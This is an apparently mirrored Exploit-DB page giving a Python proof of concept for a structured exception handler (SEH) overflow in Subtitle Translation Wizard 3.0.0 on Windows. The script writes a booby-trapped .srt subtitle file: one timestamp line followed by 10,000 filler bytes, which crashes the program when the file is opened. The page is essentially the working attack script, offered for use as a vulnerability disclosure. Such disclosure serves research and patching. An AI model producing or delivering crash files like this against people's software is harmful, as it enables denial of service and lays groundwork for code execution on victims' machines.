Subtitle Translation Wizard 3.0.0 – Overflow (SEH) (PoC)

• Exploit Database
• 183 阅读

• 作者： blake
  日期： 2010-06-22
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/13965/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29

  #!/usr/bin/python   # Exploit Title: Subtitle Translation Wizard v3.0.0 SEH POC # Date: Jun 21, 2010 # Author: Blake # Software Link: http://www.upredsun.com/subtitle-translation/download/st-wizard-setup.exe # Version: 3.0.0 # Tested on: Windows Vista running in VirtualBox   # SEH is overwritten but only unicode compatible pop pop ret addresses are in st-wizard.exe (SafeSEH).   print "\n======================================" print " Subtitle Translation Wizard v3.0.0 DoS " print " Discovered by Blake " print "======================================\n"   buffer = "\x41" * 10000   print "[+] Creating malicious srt file" try: file = open("poc.srt","w") file.write("1\n" + "00:01:48,549 --> 00:01:50,404\n" + buffer) file.close() print "[+] File created" except: print "[x] Could not create file"   raw_input("\nPress any key to exit...\n")